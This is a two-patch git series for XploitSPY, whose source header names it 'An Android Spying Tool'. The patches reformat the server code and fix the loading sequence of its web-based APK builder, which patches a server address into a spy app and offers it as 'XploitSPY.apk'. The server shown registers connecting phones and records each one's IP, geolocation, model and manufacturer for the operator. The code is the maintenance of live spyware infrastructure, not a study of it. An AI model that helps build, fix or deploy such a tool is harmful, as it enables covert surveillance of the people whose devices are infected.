From 46c997a55ff1724d6078da93b6c4ab644d41aa7e Mon Sep 17 00:00:00 2001
From: keerthimalan <keerthimalan@gmail.com>
Date: Thu, 23 Apr 2020 11:58:58 +0530
Subject: [PATCH 1/2] Fix bug in APK Builder

---
 server/assets/views/builder.ejs | 184 ++++++++++++++++----------------
 server/index.js                 |  89 ++++++++-------
 2 files changed, 133 insertions(+), 140 deletions(-)

diff --git a/server/assets/views/builder.ejs b/server/assets/views/builder.ejs
index 94abcd4..e793bb2 100644
--- a/server/assets/views/builder.ejs
+++ b/server/assets/views/builder.ejs
@@ -1,107 +1,103 @@
 <!DOCTYPE html>
-<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<meta name="viewport" content="width=device-width, initial-scale=1.0" />
 <html>
+	<% include partials/head.ejs %>
 
-<% include partials/head.ejs %>
+	<body>
+		<div class="ui container">
+			<% include partials/header.ejs %> <% include partials/disclaimer.ejs %>
+			<div class="ui segment">
+				<div id="dimmer" class="ui dimmer">
+					<div class="ui indeterminate text loader" id="loadingText">Submitting</div>
+				</div>
 
-
-    <body>
-        <div class="ui container">
-            <% include partials/header.ejs %>
-            <% include partials/disclaimer.ejs %> 
-                <div class="ui segment">
-
-                    <div id="dimmer" class="ui dimmer">
-                        <div class="ui indeterminate text loader" id="loadingText">Submitting</div>
-                    </div>
-
-                    <h1 class="ui" style="text-align: center">APK Builder</h1>
-                    <div class="ui form" id="form">
-                        <div class="inline fields">
-                            <div class="six wide field">
-                                <div class="ui labeled input">
-                                    <div class="ui label">
-                                        http://
-                                    </div>
-                                    <input type="text" id="uriInput" placeholder="IP / Public URL" title="This is the public url of your server (domain.com)">
-                                </div>
-                            </div>
-                            <!-- <div class="two wide field">
+				<h1 class="ui" style="text-align: center;">APK Builder</h1>
+				<div class="ui form" id="form">
+					<div class="inline fields">
+						<div class="six wide field">
+							<div class="ui labeled input">
+								<div class="ui label">
+									http://
+								</div>
+								<input
+									type="text"
+									id="uriInput"
+									placeholder="IP / Public URL"
+									title="This is the public url of your server (domain.com)"
+								/>
+							</div>
+						</div>
+						<!-- <div class="two wide field">
                                 <label>:</label>
                                 <input type="number" id="portInput" placeholder="PORT" min="2048" max="25565" title="This is the `control_port` set in the consts" value="<%= myPort %>">
                             </div> -->
+					</div>
+					<div class="inline fields">
+						<div class="eight wide field">
+							<button id="gobuild" class="positive ui fluid button"><i class="wrench icon"></i>Build</button>
+						</div>
+					</div>
+				</div>
 
-                        </div>
-                        <div class="inline fields">
-                            <div class="eight wide field">
-                                <button id="gobuild" class="positive ui fluid button"><i class="wrench icon"></i>Build</button>
-                            </div>
-                        </div>
-                    </div>
+				<div class="ui form" id="download" style="display: none;">
+					<div class="inline fields">
+						<div class="eight wide field">
+							<a class="blue ui fluid button" download="XploitSPY.apk" href="/build-aligned-signed.apk"
+								><i class="download icon"></i>Download</a
+							>
+						</div>
+					</div>
+				</div>
+			</div>
+		</div>
+		<style>
+			.inline.fields {
+				justify-content: center;
+			}
+		</style>
 
-                    <div class="ui form" id="download" style="display: none">
-                        <div class="inline fields">
-                            <div class="eight wide field">
-                                <a class="blue ui fluid button" download="XploitSPY.apk" href="/build-aligned-signed.apk"><i
-                                class="download icon"></i>Download</a>
-                            </div>
-                        </div>
-                    </div>
+		<script>
+			var loadingTexts = [
+				'Decompiling APK',
+				'Patching Server Information',
+				'Compiling APK',
+				'Signing APK',
+				'Verifying Build',
+				'Finalizing',
+			];
 
-                </div>
-        </div>
-        <style>
-            .inline.fields {
-                justify-content: center;
-            }
-        </style>
+			document.getElementById('uriInput').value = window.location.hostname;
 
-        <script>
-            var loadingTexts = [
-                "Decompiling APK",
-                "Patching Server Information",
-                "Compiling APK",
-                "Signing APK",
-                "Verifying Build",
-                "Finalizing"
-            ];
-
-            document.getElementById('uriInput').value = window.location.hostname;
-
-            var loadingIndex = 0;
-            var isDone = false;
-            $('#gobuild').click((e) => {
-                $('#dimmer').addClass('active');
-                build($('#uriInput').val(), "80");
-                setTimeout(loaderText, 500);
-            });
-
-            function loaderText() {
-                var nextTimeout = Math.floor(Math.random() * 1500) + 700;
-                $('#loadingText').text(loadingTexts[loadingIndex]);
-                loadingIndex++;
-                if (loadingIndex !== loadingTexts.length) setTimeout(loaderText, nextTimeout);
-                else
-                    while (isDone) {
-                        isDone = false;
-                        $('#dimmer').fadeOut(500, () => {
-                            $('#download').removeClass('active');
-                        })
-                        $('#form').fadeOut(500, () => {
-                            $('#download').fadeIn(200);
-                        })
-                    }
-            }
-
-            function build(URI, PORT) {
-                $.post("/builder?uri=" + URI + "&port=" + PORT, function(data) {
-                    if (!data.error) {
-                        isDone = true
-                    } else showNotification('#f03434', data.error)
-                });
-            }
-        </script>
-        <% include partials/footer.ejs %>
-    </body>
+			var loadingIndex = 0;
+			var isDone = false;
+			$('#gobuild').click((e) => {
+				$('#dimmer').addClass('active');
+				build($('#uriInput').val(), '80');
+				setTimeout(loaderText, 500);
+			});
+			function loaderText() {
+				var nextTimeout = Math.floor(Math.random() * 1500) + 700;
+				if (loadingIndex < loadingTexts.length) $('#loadingText').text(loadingTexts[loadingIndex++]);
+				if (loadingIndex !== loadingTexts.length && !isDone) setTimeout(loaderText, nextTimeout);
+				else if (loadingIndex === loadingTexts.length && !isDone) setTimeout(loaderText, 300);
+				else
+					while (isDone) {
+						isDone = false;
+						$('#dimmer').fadeOut(500, () => {
+							$('#download').removeClass('active');
+						});
+						$('#form').fadeOut(500, () => {
+							$('#download').fadeIn(200);
+						});
+					}
+			}
 
+			const build = async (URI, PORT) => {
+				let data = await $.post('/builder?uri=' + URI + '&port=' + PORT);
+				if (!data.error) isDone = true;
+				else showNotification('#f03434', data.error);
+			};
+		</script>
+		<% include partials/footer.ejs %>
+	</body>
 </html>
diff --git a/server/index.js b/server/index.js
index 1636ce8..d5ea66c 100644
--- a/server/index.js
+++ b/server/index.js
@@ -1,22 +1,21 @@
-/* 
+/*
  *   XploitSPY
  *   An Android Spying Tool
  *   By Team XploitWizer
  */
 
-
-const
-    express = require('express'),
-    app = express(),
-    server = require('http').createServer(app),
-    IO = require('socket.io')(server),
-    path = require('path'),
-    geoip = require('geoip-lite'),
-    CONST = require(path.join(__dirname,'/includes/const')),
-    db = require(path.join(__dirname,'/includes/databaseGateway')),
-    logManager = require(path.join(__dirname, '/includes/logManager')),
-    clientManager = new(require(path.join(__dirname, '/includes/clientManager')))(db),
-    apkBuilder = require(path.join(__dirname, '/includes/apkBuilder'))
+const express = require('express'),
+	app = express(),
+	server = require('http').createServer(app),
+	IO = require('socket.io')(server),
+	path = require('path'),
+	geoip = require('geoip-lite'),
+	CONST = require(path.join(__dirname, '/includes/const')),
+	db = require(path.join(__dirname, '/includes/databaseGateway')),
+	logManager = require(path.join(__dirname, '/includes/logManager')),
+	clientManager = new (require(path.join(__dirname, '/includes/clientManager')))(db),
+	apkBuilder = require(path.join(__dirname, '/includes/apkBuilder'));
+port = process.env.PORT || CONST.web_port;
 
 global.CONST = CONST;
 global.db = db;
@@ -31,47 +30,45 @@ global.apkBuilder = apkBuilder;
 // client_io.sockets.pingInterval = 30000;
 IO.sockets.pingInterval = 30000;
 IO.on('connection', (socket) => {
-    socket.emit('welcome');
-    let clientParams = socket.handshake.query;
-    let clientAddress = socket.request.connection;
+	socket.emit('welcome');
+	let clientParams = socket.handshake.query;
+	let clientAddress = socket.request.connection;
 
-    let clientIP = clientAddress.remoteAddress.substring(clientAddress.remoteAddress.lastIndexOf(':') + 1);
-    let clientGeo = geoip.lookup(clientIP);
-    if (!clientGeo) clientGeo = {}
+	let clientIP = clientAddress.remoteAddress.substring(clientAddress.remoteAddress.lastIndexOf(':') + 1);
+	let clientGeo = geoip.lookup(clientIP);
+	if (!clientGeo) clientGeo = {};
 
-    clientManager.clientConnect(socket, clientParams.id, {
-        clientIP,
-        clientGeo,
-        device: {
-            model: clientParams.model,
-            manufacture: clientParams.manf,
-            version: clientParams.release
-        }
-    });
+	clientManager.clientConnect(socket, clientParams.id, {
+		clientIP,
+		clientGeo,
+		device: {
+			model: clientParams.model,
+			manufacture: clientParams.manf,
+			version: clientParams.release,
+		},
+	});
 
-    if (CONST.debug) {
-        var onevent = socket.onevent;
-        socket.onevent = function(packet) {
-            var args = packet.data || [];
-            onevent.call(this, packet); // original call
-            packet.data = ["*"].concat(args);
-            onevent.call(this, packet); // additional call to catch-all
-        };
-
-        socket.on("*", function(event, data) {
-            console.log(event);
-            console.log(data);
-        });
-    }
+	if (CONST.debug) {
+		var onevent = socket.onevent;
+		socket.onevent = function (packet) {
+			var args = packet.data || [];
+			onevent.call(this, packet); // original call
+			packet.data = ['*'].concat(args);
+			onevent.call(this, packet); // additional call to catch-all
+		};
 
+		socket.on('*', function (event, data) {
+			console.log(event);
+			console.log(data);
+		});
+	}
 });
 
-
 // get the admin interface online
 // app.listen(CONST.web_port);
-server.listen(process.env.PORT || CONST.web_port)
+server.listen(port, () => console.log(`listening on port ${port}`));
 
 app.set('view engine', 'ejs');
 app.set('views', path.join(__dirname, '/assets/views'));
 app.use(express.static(__dirname + '/assets/webpublic'));
-app.use(require(path.join(__dirname, '/includes/expressRoutes')));
\ No newline at end of file
+app.use(require(path.join(__dirname, '/includes/expressRoutes')));

From ed0d4ed438e1bf693d435aa5c5c4ec8ff92adc65 Mon Sep 17 00:00:00 2001
From: keerthimalan <keerthimalan@gmail.com>
Date: Thu, 23 Apr 2020 13:10:31 +0530
Subject: [PATCH 2/2] Update Fix bug in APK Builder

---
 server/assets/views/builder.ejs | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/server/assets/views/builder.ejs b/server/assets/views/builder.ejs
index e793bb2..c30829f 100644
--- a/server/assets/views/builder.ejs
+++ b/server/assets/views/builder.ejs
@@ -78,7 +78,7 @@
 			function loaderText() {
 				var nextTimeout = Math.floor(Math.random() * 1500) + 700;
 				if (loadingIndex < loadingTexts.length) $('#loadingText').text(loadingTexts[loadingIndex++]);
-				if (loadingIndex !== loadingTexts.length && !isDone) setTimeout(loaderText, nextTimeout);
+				if (loadingIndex !== loadingTexts.length) setTimeout(loaderText, nextTimeout);
 				else if (loadingIndex === loadingTexts.length && !isDone) setTimeout(loaderText, 300);
 				else
 					while (isDone) {